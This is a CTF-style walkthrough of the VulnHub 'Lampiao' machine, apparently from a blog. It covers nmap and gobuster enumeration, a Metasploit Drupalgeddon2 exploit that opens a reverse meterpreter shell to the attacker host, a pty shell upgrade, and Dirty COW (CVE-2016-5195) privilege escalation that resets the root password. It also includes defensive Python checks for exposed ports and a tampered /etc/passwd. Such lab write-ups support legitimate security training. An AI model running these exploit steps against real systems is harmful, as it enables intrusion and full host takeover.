Lampiao

Target description

https://www.vulnhub.com/entry/lampiao-1,249/

Host discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 10:20 CST
Nmap scan report for 192.168.2.1
Host is up (0.00068s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00043s latency).
MAC Address: 08:00:27:07:6D:A0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.10
Host is up (0.00067s latency).
MAC Address: 08:00:27:62:07:F9 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.07 seconds

Nmap scanning

(1) Port scan

┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.2.10 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 10:22 CST
Nmap scan report for 192.168.2.10
Host is up (0.0021s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1898/tcp open cymtec-port
MAC Address: 08:00:27:62:07:F9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 22.19 seconds
  • Open ports found: 22, 80, 1898

(2) Service and version scan of the open ports

┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
└─$ sudo nmap -sT -sV -O --min-rate 10000 -p22,80,1898 192.168.2.10 -oA nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 10:25 CST
Nmap scan report for 192.168.2.10
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http?
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=2/8%Time=67A6C09D%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1179,"\x20_____\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\
SF:\|_\|\x20\|\x20\(_\|\x20\|_\|\n\\_\|\x20\x20\x20\|_\|\x20\x20\\__,_\|\\
SF:__,_\|_\|\x20\|_\|");
MAC Address: 08:00:27:62:07:F9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.18 seconds

(3) UDP scan

┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
└─$ sudo nmap -sU -p22,80,1898 192.168.2.10 -oA nmapscan/udp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 10:29 CST
Nmap scan report for 192.168.2.10
Host is up (0.00095s latency).

PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
1898/udp closed cymtec-port
MAC Address: 08:00:27:62:07:F9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds
  • No open UDP ports

(4) Vulnerability script scan

┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
└─$ sudo nmap --script=vuln -p22,80,1898 192.168.2.10 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 10:29 CST
Nmap scan report for 192.168.2.10
Host is up (0.0012s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
1898/tcp open cymtec-port
MAC Address: 08:00:27:62:07:F9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 49.75 seconds
  • The vuln scripts reported no vulnerabilities
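The four scans above are saved with -oA, and the .nmap file they write is plain text in the same layout as the terminal output. From the defender's side the useful thing to do with that file is to parse it and diff the observed exposure against what the host is supposed to expose, so that a service such as the one on 1898 shows up automatically. The parser and baseline check below are an added example, not part of this write-up; the sample text is the port-scan output from above, and the allowed baseline is a hypothetical one chosen for illustration.

```python
import re

# Constructed sample: the normal-format output of the full port scan above, as
# saved to nmapscan/ports.nmap by -oA.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.2.10
Host is up (0.0021s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port
MAC Address: 08:00:27:62:07:F9 (Oracle VirtualBox virtual NIC)
"""

# One port line: "<port>/<proto>  <state>  <service>". nmap pads the columns
# with a variable number of spaces, so match on whitespace runs.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_open_ports(text):
    """Return {(port, proto): service} for every port nmap reports as open."""
    found = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "open":
            found[(int(m.group(1)), m.group(2))] = m.group(4)
    return found


def unexpected_exposure(observed, allowed):
    """Open ports that are not in the allowed baseline, sorted for reporting."""
    return sorted(p for p in observed if p not in allowed)


# Hypothetical baseline for this host: only SSH and the web front end on 80
# are meant to be reachable, so the Drupal instance on 1898 should stand out.
ALLOWED_BASELINE = {(22, "tcp"), (80, "tcp")}

if __name__ == "__main__":
    open_ports = parse_open_ports(SAMPLE_NMAP_OUTPUT)
    for (port, proto), service in sorted(open_ports.items()):
        print(f"{port}/{proto}\t{service}")
    print("outside baseline:", unexpected_exposure(open_ports, ALLOWED_BASELINE))
```

Run against the real file with `parse_open_ports(open("nmapscan/ports.nmap").read())`; the same function works on the UDP scan, where every port is closed and the result is empty.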

Web penetration

Port 80

(1) Visiting port 80 shows a static page; the page source contains nothing useful

(2) Directory scan

┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
└─$ sudo gobuster dir -u http://192.168.2.10 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.10
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

Error: error on running gobuster: unable to connect to http://192.168.2.10/: Get "http://192.168.2.10/": read tcp 192.168.2.4:38794->192.168.2.10:80: read: connection reset by peer
  • gobuster cannot connect to port 80

Port 1898

(1) Visiting port 1898 shows that the CMS is Drupal

(2) Directory scan of port 1898

┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
└─$ sudo gobuster dir -u http://192.168.2.10:1898 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.10:1898
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 286]
/.php (Status: 403) [Size: 285]
/misc (Status: 301) [Size: 317] [--> http://192.168.2.10:1898/misc/]
/themes (Status: 301) [Size: 319] [--> http://192.168.2.10:1898/themes/]
/modules (Status: 301) [Size: 320] [--> http://192.168.2.10:1898/modules/]
/scripts (Status: 301) [Size: 320] [--> http://192.168.2.10:1898/scripts/]
/index.php (Status: 200) [Size: 11400]
/sites (Status: 301) [Size: 318] [--> http://192.168.2.10:1898/sites/]
/includes (Status: 301) [Size: 321] [--> http://192.168.2.10:1898/includes/]
/profiles (Status: 301) [Size: 321] [--> http://192.168.2.10:1898/profiles/]
/update.php (Status: 403) [Size: 4129]
/install.php (Status: 200) [Size: 3257]
/robots.txt (Status: 200) [Size: 2189]
/cron.php (Status: 403) [Size: 7390]
/xmlrpc.php (Status: 200) [Size: 42]
/.php (Status: 403) [Size: 285]
/.html (Status: 403) [Size: 286]
/server-status (Status: 403) [Size: 294]
/authorize.php (Status: 403) [Size: 2896]
Progress: 830572 / 830576 (100.00%)
===============================================================
Finished
===============================================================
  • Quite a few sensitive files turn up; robots.txt points to CHANGELOG.txt

  • CHANGELOG.txt gives the Drupal version as 7.54, dated 1 February 2017

Drupal CMS penetration

(1) The enumeration above confirms that the CMS is Drupal 7.54, released 2017-02-01. Search Google for vulnerabilities disclosed from 2017 onward, or search within msf

┌──(kali㉿kali)-[/miao/vulnhub/lampiao]
└─$ msfconsole
Metasploit tip: Use the edit command to open the currently active module
in your editor

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v6.4.20-dev ]
+ -- --=[ 2440 exploits - 1256 auxiliary - 429 post ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search drupal

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 \_ target: Automatic (PHP In-Memory)
3 \_ target: Automatic (PHP Dropper)
4 \_ target: Automatic (Unix In-Memory)
5 \_ target: Automatic (Linux Dropper)
6 \_ target: Drupal 7.x (PHP In-Memory)
7 \_ target: Drupal 7.x (PHP Dropper)
8 \_ target: Drupal 7.x (Unix In-Memory)
9 \_ target: Drupal 7.x (Linux Dropper)
10 \_ target: Drupal 8.x (PHP In-Memory)
11 \_ target: Drupal 8.x (PHP Dropper)
12 \_ target: Drupal 8.x (Unix In-Memory)
13 \_ target: Drupal 8.x (Linux Dropper)
14 \_ AKA: SA-CORE-2018-002
15 \_ AKA: Drupalgeddon 2
16 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
17 \_ target: Drupal 7.0 - 7.31 (form-cache PHP injection method)
18 \_ target: Drupal 7.0 - 7.31 (user-post PHP injection method)
19 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
20 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
21 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
22 \_ target: PHP In-Memory
23 \_ target: Unix In-Memory
24 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
25 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution

Interact with a module by name or index. For example info 25, use 25 or use exploit/unix/webapp/php_xmlrpc_eval

(2) Combining the information collected, choose drupal_drupalgeddon2 (disclosed 2018-03-28)

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp

(3) Configure the module

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.2.4
lhost => 192.168.2.4
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.2.10
rhost => 192.168.2.10
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
rport => 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show option
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 192.168.2.4:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.2.10
[*] Meterpreter session 1 opened (192.168.2.4:4444 -> 192.168.2.10:45742) at 2025-02-08 11:20:51 +0800

meterpreter >

(4) Type shell; the connection is established

meterpreter > shell
Process 4974 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

(5) Get a stable shell

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$

Privilege escalation: Dirty COW

(1) Use the linux-exploit-suggester.sh script to look for escalation paths; upload it to the temporary directory

meterpreter > upload /miao/vulnhub/lampiao/linux-exploit-suggester.sh /tmp/1.sh
[*] Uploading : /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Uploaded -1.00 B of 88.80 KiB (-0.0%): /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Completed : /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
meterpreter >

(2) Enter the interactive shell, make the script executable, and run it

meterpreter > shell
Process 5651 created.
Channel 2 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$ cd /tmp
cd /tmp
www-data@lampiao:/tmp$ chmod +x 1.sh
chmod +x 1.sh
www-data@lampiao:/tmp$ ./1.sh
./1.sh

(3) From the script's output, choose a relevant vulnerability to exploit (usually one of the highlighted entries)

(4) Use CVE-2016-5195

  • Exploit script: https://github.com/gbonacini/CVE-2016-5195; upload it to /tmp
    meterpreter > upload /miao/vulnhub/lampiao/CVE-2016-5195-master/ /tmp/

  • Compile dcow.cpp
    www-data@lampiao:/tmp$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

(5) Run dcow to reset the root password

www-data@lampiao:/tmp$ ./dcow
./dcow
Running ...
Received su prompt (Password: )
Root password is: dirtyCowFun
Enjoy! :-)

(6) Switch to root

www-data@lampiao:/tmp$ su root
su root
Password: dirtyCowFun

root@lampiao:/tmp#
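The dcow tool from the repository above resets the root password by using the CVE-2016-5195 race to rewrite the root line of /etc/passwd with a hash of its own; the write-up only says it resets the password, so that description of the mechanism is mine, not the page's. The durable trace it leaves is therefore a root entry whose second field holds a hash instead of the "x" that defers to /etc/shadow, which a host integrity check can catch. The audit below is an added example, not part of this write-up; both /etc/passwd samples are constructed and the hash value is a dummy.

```python
# Constructed sample: an /etc/passwd whose root entry has been rewritten so that
# its second field carries a password hash directly. On a stock system that
# field is "x" and the real hash lives in /etc/shadow. The hash is a dummy.
TAMPERED_PASSWD = """\
root:$6$dummysalt$dummyhashvalue:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

# Constructed sample of an untouched file, for comparison.
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

# Password-field values that defer to /etc/shadow or lock the account outright.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


def audit_passwd(text):
    """Return [(account, issue)] for entries that should not appear in a healthy
    /etc/passwd: inline hashes, empty password fields, extra uid-0 accounts and
    malformed lines."""
    findings = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((name, "empty password field (no password required)"))
        elif pw not in SHADOW_MARKERS:
            findings.append((name, "password hash stored inline, bypassing /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append((name, "additional uid 0 account"))
    return findings


if __name__ == "__main__":
    for account, issue in audit_passwd(TAMPERED_PASSWD):
        print(f"{account}: {issue}")
```

On the live host the same check runs over `open("/etc/passwd").read()`; pairing it with the file's mtime and the kernel version reported by the exploit suggester gives a quick answer to whether this escalation path was used and whether it is still open.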

Read the flag

root@lampiao:~# cat /root/flag.txt
cat /root/flag.txt
9740616875908d91ddcdaa8aea3af366

Summary

(1) The main points are exploiting the Drupal CMS vulnerability and using msf
(2) Dirty COW privilege escalation, which works by resetting the root password
(3) Using python to get a stable shell

python -c 'import pty;pty.spawn("/bin/bash")'

Lampiao
http://miao-sec.github.io/Vulnhub/Lampiao/
Author
Miao
Published on
20 June 2025
License
BY-MIAO